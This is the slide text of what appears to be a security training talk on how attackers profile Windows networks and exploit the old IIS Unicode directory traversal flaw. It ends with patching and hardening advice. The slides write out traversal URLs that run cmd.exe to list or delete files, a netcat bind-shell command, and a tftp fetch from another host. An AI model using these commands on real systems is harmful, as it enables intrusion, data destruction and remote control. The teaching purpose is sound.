expose the vulnerability paul hogan ward solutions
Post on 01-Apr-2015
218 Views
Preview:
TRANSCRIPT
Expose the Vulnerability
Paul Hogan
Ward Solutions
Session Prerequisites
Hands-on experience with Windows 2000 or Windows Server 2003
Working knowledge of networking, including basics of security
Basic knowledge of network security-assessment strategies
Level 300
Anatomy of a Hack
Information Gathering / Profiling
nslookup, whois
Probe / Enumerating
Superscan, nmap, nessus, nikto, banner grabbing, OS fingerprinting
Attack
Unicode directory traversal
Advancement
Entrenchment
Infiltration/Extraction
nslookup
RIPE Whois
superscan
Simple Command Line Utilities
net view \\172.16.10.5
net use \\172.16.10.5
net use \\172.16.10.5 "" /u:"" red button vulnerability
net view \\172.16.10.5
nbtstat -A 172.16.10.5
nbtscan -r 172.16.10.0/24
net use \\172.16.10.5 "" /u:guest
nmap nessus
nikto
Overview
Name: Microsoft IIS 4.0/5.0 Extended Unicode Directory Traversal Vulnerability. (BugTraq ID 1806)
Operating System: Windows NT 4.0 (+ IIS 4.0) and Windows 2000 (+ IIS 5.0).
Brief Description: A particular type of malformed URL could be used to access files and directories beyond the web folders. This would potentially enable a malicious user to gain privileges commensurate with those of a locally logged-on users. Gaining these permissions would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it.
Impacts
If the E-business web server was compromised, the backend database sever is under threat too. Trust relationship. Same passwords. Database connection pools. Use web server and database server as a relay to connect the outside machine with the internal machines. Then firewall is circumvented……
If the compromised web server is a site for software distribution, add Trojans or Zombie codes to the downloadable software, then you can control all the machines which download software from that website…..
Solutions
Install patches as soon as possible
Patch Management: SMS/SUS/MBSA
Disable NetBIOS over TCP/IP.
Be sure that the IUSR_machinename account does not have write access to any files on the server.
Unicode Directory Traversal Attack
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\+/s
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\*.*
perl -x unicodexecute.pl 172.16.10.5:80 dir
perl -x unicodexecute.pl 172.16.10.5:80 tftp -i 172.10.10.21 GET *.*
perl -x unicodexecute.pl 172.16.10.5:80 nc -L –p555 -d -e cmd.exe
c:\nc 192.168.1.2 443
How To Get Your Network Hacked In 10 Easy Steps
1. Don’t patch anything2. Run unhardened applications3. Logon everywhere as a domain admin4. Open lots of holes in the firewall5. Allow unrestricted internal traffic6. Allow all outbound traffic7. Don’t harden servers8. Use lame passwords9. Use high-level service accounts, in multiple places10. Assume everything is OK
The moral
Initial entry is everything
Most networks are designed like egg shells
Hard and crunchy on the outside
Soft and chewy on the inside
Once an attacker is inside the network you can…
Update resume
Hope he does a good job running it
Drain the network
top related